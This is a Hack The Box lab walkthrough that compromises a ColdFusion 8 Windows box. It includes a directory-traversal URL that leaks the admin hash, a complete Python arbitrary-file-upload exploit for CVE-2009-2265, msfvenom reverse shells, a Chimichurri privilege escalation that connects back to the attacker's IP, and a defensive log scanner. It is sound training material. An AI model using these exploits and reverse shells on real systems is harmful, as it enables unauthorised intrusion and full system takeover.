Windows Boxes

Arctic

  1. nmap
  2. enumeration
    1. /CFIDE
      1. /administrator
  3. initial foothold
    1. with metasploit
      1. localhost proxy listener
      2. fckeditor reverseshell
    2. w/o metasploit
      1. searchsploit
      2. directory traversal (LFI)
        1. admin pass
          1. Crackstation
        2. pagesource
        3. webpage console
          1. admin
      3. reverse shell through file upload
        1. scheduling a task
      4. arrexel reverse shell
        1. arbitrary file upload by arrexel
          1. exploit
          2. vi arrexel_exploit.py
          3. jsp generated payload w/ msfvenom
          4. run
  4. privesc
    1. windows exploit suggester
      1. sysinfo
      2. report
    2. ms10-059 -> chimichurri
      1. upload with arrexel's file uploader
      2. run
  5. user/root
  6. Lessons Learned

Arctic

images/45-1.png
images/45-2.png

nmap

images/46-1.png
Making note of the services running:
Ports 135 & 49154: running Microsoft Windows RPC. (SMB)
Port 8500: possibly running Flight Message Transfer Protocol (FMTP).

enumeration

Let's start our enumeration phase by visiting port 8500 in a browser:
images/727-1.png

/CFIDE

images/729-1.png

images/729-2.png: /CFIDE is an interesting directory, let's navigate to that first.

/administrator

We get a login page. images/730-1.png shows the version of ColdFusion the server is running; let's see if searchsploit has anything on it...

images/730-2.png

initial foothold

images/734-1.png
Let's fire up searchsploit for ColdFusion 8 vulns:
images/734-2.png

After reviewing the exploits, two of them stand out:
14641 - Directory Traversal. We'll use that to get the password of the administrator.
45979 - Arbitrary File Upload. We'll use that to get a reverse shell on the target machine.

with metasploit


localhost proxy listener

First, set up a proxy listener in Burp so we can capture the requests the Metasploit ColdFusion exploit sends as we launch it.

images/49-1.png

fckeditor reverseshell

images/47-1.png

Run the exploit, catch the request in Burp Suite, and send it to Repeater:
images/47-2.png

We see that the exploit successfully uploaded our reverse shell and saved it at /userfiles/file/YI.jsp; we can navigate to that URL in our browser to run it.
images/47-3.png
images/47-4.png

When we navigate to the JSP file we uploaded, our reverse shell runs:
images/47-5.png



w/o metasploit


searchsploit

Run searchsploit adobe coldfusion and see what comes up:

We're only interested in version 8 and earlier...
images/732-1.png


directory traversal (LFI)

Let's take a look at the directory traversal exploit and see how it works:

images/733-1.png

We don't need to run the exploit script; we can plug the directory traversal URL straight into our browser:
images/733-2.png

Adapted to this URL for the Arctic box:
images/733-3.png
i.e. http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en


There are additional notes in the exploit's source code in case we run into blocked directories:
images/733-4.png

admin pass

The password hash (images/735-1.png) is output to the screen!

2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
images/735-2.png

Crackstation

We can also use CrackStation to look up the hash:
images/738-1.png
happyday is our password, BUT it will not work directly, as the admin login page only accepts the salted hash computed on the client side.

pagesource

Right click on the page and select View Page Source. There, we find three pieces of important information on the steps taken to send the password to the backend.

1) The password is taken from the password field and hashed using SHA1. This is done on the client side.
2) Then the hashed password is HMAC-ed using a salt value taken from the parameter salt field. This is also done on the client side.
3) The HMAC-ed password gets sent to the server with the salt value. There, I’m assuming the server verifies that the hashed password was HMAC-ed with the correct salt value.

images/736-1.png

The stored value images/736-2.png is a hash of the real password.

Therefore, instead of cracking the password (which can take a long time!), we can calculate cfadminPassword.value ourselves and use an intercepting proxy to bypass the client-side calculation.

webpage console

To quickly calculate the cfadminPassword value, use the Console in your browser's Developer Tools to run the following JS code (the login page already loads the hex_hmac_sha1 function it uses):

console.log(hex_hmac_sha1(document.loginform.salt.value, '2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03'))
images/737-1.png
images/737-2.png
Now let's intercept the login request with Burp Suite and plug this value into cfadminPassword:

Note: we only have a 30-second window to enter this hash before the salt refreshes, so be quick! If you miss the window, just generate the new salted hash and try again.
images/737-3.png
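To show why the leaked hash alone is enough, here is the same client-side calculation in Python (an added example, not code from the original writeup). It assumes the ColdFusion 8 login form behaviour described above: SHA-1 of the password as uppercase hex, then HMAC-SHA1 keyed with the server-supplied salt, exactly what hex_hmac_sha1(salt, hash) computes; the salt value is constructed.

```python
import hashlib
import hmac

# Hash leaked from password.properties on the page: SHA-1 of the admin
# password as uppercase hex, which is what ColdFusion 8 stores.
STORED_HASH = "2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03"


def sha1_upper(password):
    """Step 1 of the login form: SHA-1 of the typed password, uppercase hex."""
    return hashlib.sha1(password.encode()).hexdigest().upper()


def cf_login_token(salt, password_hash):
    """Step 2: hex_hmac_sha1(salt, hash). The salt the server put in the form
    is the HMAC key and the uppercase SHA-1 hex string is the message, which
    is what the console one-liner above computes."""
    return hmac.new(salt.encode(), password_hash.encode(), hashlib.sha1).hexdigest()


def token_from_password(salt, password):
    """What a browser computes for a user who actually knows the password."""
    return cf_login_token(salt, sha1_upper(password))


def hash_is_password_equivalent(salt, password, stored_hash):
    """True when the token derived from the stored hash alone equals the one a
    legitimate login produces: the server cannot tell the two apart, so the
    per-request salt only prevents replay of the wire value, it does not
    protect against a leaked password.properties."""
    return cf_login_token(salt, stored_hash) == token_from_password(salt, password)


if __name__ == "__main__":
    salt = "1590000000000"  # constructed; the real form refreshes it every 30 s
    print(cf_login_token(salt, STORED_HASH))
    print(hash_is_password_equivalent(salt, "happyday", STORED_HASH))
```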

admin

A few botched attempts and regenerated hashes later, and WE'RE IN!

images/739-1.png

reverse shell through file upload

If we take a look at the admin capabilities, under the Debugging & Logging tab we can see we have the ability to schedule a task to be run; let's take a closer look at this.

images/740-1.png

scheduling a task

images/741-1.png
From here, upload our msfvenom JSP reverse shell, schedule it to run as often as possible, then set up a listener and wait for the connect-back.

To be continued...use arrexel's reverse shell for now

arrexel reverse shell

A fellow hacker and HTB enthusiast named arrexel also published an arbitrary file upload exploit in his Arctic writeup; I want to use his exploit to gain a foothold on the box as well.

arbitrary file upload by arrexel

images/742-1.png
images/742-2.png
images/742-3.png

exploit

#!/usr/bin/python
# Exploit Title: ColdFusion 8.0.1 - Arbitrary File Upload
# Date: 2017-10-16
# Exploit Author: Alexander Reid
# Vendor Homepage: http://www.adobe.com/products/coldfusion-family.html
# Version: ColdFusion 8.0.1
# CVE: CVE-2009-2265
#
# Description:
# A standalone proof of concept that demonstrates an arbitrary file upload vulnerability in ColdFusion 8.0.1
# Uploads the specified jsp file to the remote server.
#
# Usage: ./exploit.py <target ip> <target port> [/path/to/coldfusion] </path/to/payload.jsp>
# Example: ./exploit.py 127.0.0.1 8500 /home/arrexel/shell.jsp
#
# Note: this is a Python 2 script (print statements); run it with python2.
import requests, sys

try:
    ip = sys.argv[1]
    port = sys.argv[2]
    if len(sys.argv) == 5:
        # optional ColdFusion path given before the payload
        path = sys.argv[3]
        with open(sys.argv[4], 'r') as payload:
            body = payload.read()
    else:
        path = ""
        with open(sys.argv[3], 'r') as payload:
            body = payload.read()
except IndexError:
    print 'Usage: ./exploit.py <target ip/hostname> <target port> [/path/to/coldfusion] </path/to/payload.jsp>'
    print 'Example: ./exploit.py example.com 8500 /home/arrexel/shell.jsp'
    sys.exit(-1)

# e.g. http://10.10.10.11:8500 when no ColdFusion path is given
basepath = "http://" + ip + ":" + port + path

print 'Sending payload...'

try:
    req = requests.post(basepath + "/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/exploit.jsp%00", files={'newfile': ('exploit.txt', body, 'application/x-java-archive')}, timeout=30)
    if req.status_code == 200:
        print 'Successfully uploaded payload!\nFind it at ' + basepath + '/userfiles/file/exploit.jsp'
    else:
        print 'Failed to upload payload... ' + str(req.status_code) + ' ' + req.reason
except requests.Timeout:
    print 'Failed to upload payload... Request timed out'
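From the defender's side, the two requests used in this writeup (the null-byte-terminated locale traversal against enter.cfm and the POST to the FCKeditor upload connector) are easy to spot in web server logs. The following is an added example, not part of the writeup or arrexel's code: a small Python scanner over constructed Common Log Format lines; real ColdFusion/JRun log layouts may differ and only the regex would need adjusting.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines (Common Log Format); not real Arctic logs.
SAMPLE_LOG = """\
10.10.14.62 - - [28/May/2020:10:01:02 +0000] "GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en HTTP/1.1" 200 5120
10.10.14.62 - - [28/May/2020:10:03:15 +0000] "POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/exploit.jsp%00 HTTP/1.1" 200 312
10.10.14.62 - - [28/May/2020:10:03:20 +0000] "GET /userfiles/file/exploit.jsp HTTP/1.1" 200 0
192.0.2.7 - - [28/May/2020:10:05:00 +0000] "GET /CFIDE/administrator/enter.cfm?locale=en HTTP/1.1" 200 5120
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
UPLOAD_CONNECTOR = "/cfide/scripts/ajax/fckeditor/"


def classify(method, target):
    """Return the reasons a request target matches the activity described above."""
    reasons = []
    parts = urlsplit(target)
    # %00 decodes to a real NUL: the truncation trick used in both requests above
    if "\x00" in unquote(target):
        reasons.append("null byte in request target")
    # parse_qsl already percent-decodes values, so ../ sequences are visible
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if "../" in value or "..\\" in value:
            reasons.append(f"path traversal in parameter '{key}'")
    path = unquote(parts.path).lower()
    if method == "POST" and path.startswith(UPLOAD_CONNECTOR):
        reasons.append("FCKeditor upload connector used")
    if path.startswith("/userfiles/file/") and path.endswith(".jsp"):
        reasons.append("JSP served from the userfiles upload directory")
    return reasons


def scan(log_text):
    """Return (source ip, method, target, reasons) for every suspicious request line."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify(m["method"], m["target"])
        if reasons:
            findings.append((m["src"], m["method"], m["target"], reasons))
    return findings
```

Calling scan(SAMPLE_LOG) returns three findings for the constructed lines above and none for the benign locale=en request.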

vi arrexel_exploit.py

Copy and paste arrexel's code into a file we create with vi and give it execute permissions:

images/746-1.png
images/746-2.png
images/746-3.png


jsp generated payload w/ msfvenom

We'll use the java/jsp_shell_reverse_tcp payload to connect back to our attacking machine:

images/744-1.png

run

Usage: images/747-1.png

So we'll run python arrexel_exploit.py 10.10.10.11 8500 shell.jsp (target IP and port are separate arguments) and set up a listener:

images/747-2.png

Let's navigate to the URL specified and...

images/747-3.png

images/747-4.png
images/747-5.png

privesc


windows exploit suggester

To run Windows Exploit Suggester against this box, we first have to get the system info and copy it to a file on our attack machine.

First, let's update the database:
images/751-1.png

Copy the box's systeminfo output from our reverse shell and save it into a sysinfo text file:
images/751-2.png

Now run the suggester with the updated database file and the sysinfo text file:
images/751-3.png

images/751-4.png
Oof, we have to update the xlrd library; let's do that:

pip install xlrd
images/751-5.png

Let's try again... success!
images/751-6.png

sysinfo

Save this to our sysinfo text file:

images/749-1.png

report

./windows-exploit-suggester.py --database 2020-05-28-mssb.xls --systeminfo /root/Documents/htb/boxes/arctic/sysinfo

images/752-1.png

ms10-059 -> chimichurri

A bunch of exploits work here, but let's try one I know works: MS10-059 (Chimichurri).

images/753-1.png
Save it and move it to our working directory:

images/753-2.png
images/753-3.png


images/753-4.png
images/753-5.png

upload with arrexel's file uploader

First we need to update arrexel's exploit to handle .exe files instead of .jsp, changing:

images/754-1.png
to:
images/754-2.png


Let's run it again:
python arrexel_exploit_exe.py 10.10.10.11 8500 MS10-059.exe
images/754-3.png

It uploads to the following directory on Arctic:
cd C:\ColdFusion8\wwwroot\userfiles\file


run

Finally, let's run the privesc program from our initial foothold shell:

images/755-1.png
Run Chimichurri (exploit.exe) and have it connect back to our attacking machine:

exploit.exe 10.10.14.62 6666
images/755-2.png

Look back at our listener and...
images/755-3.png
We are NT AUTHORITY\SYSTEM!

user/root

images/748-1.png
02650d3a69a70780c302e146a6cb96f3

images/748-2.png
ce65ceee66b2b5ebaff07e50508ffb90

Lessons Learned

Check out Rana Khalil's OSCP writeups and prep at https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/
images/1450-1.png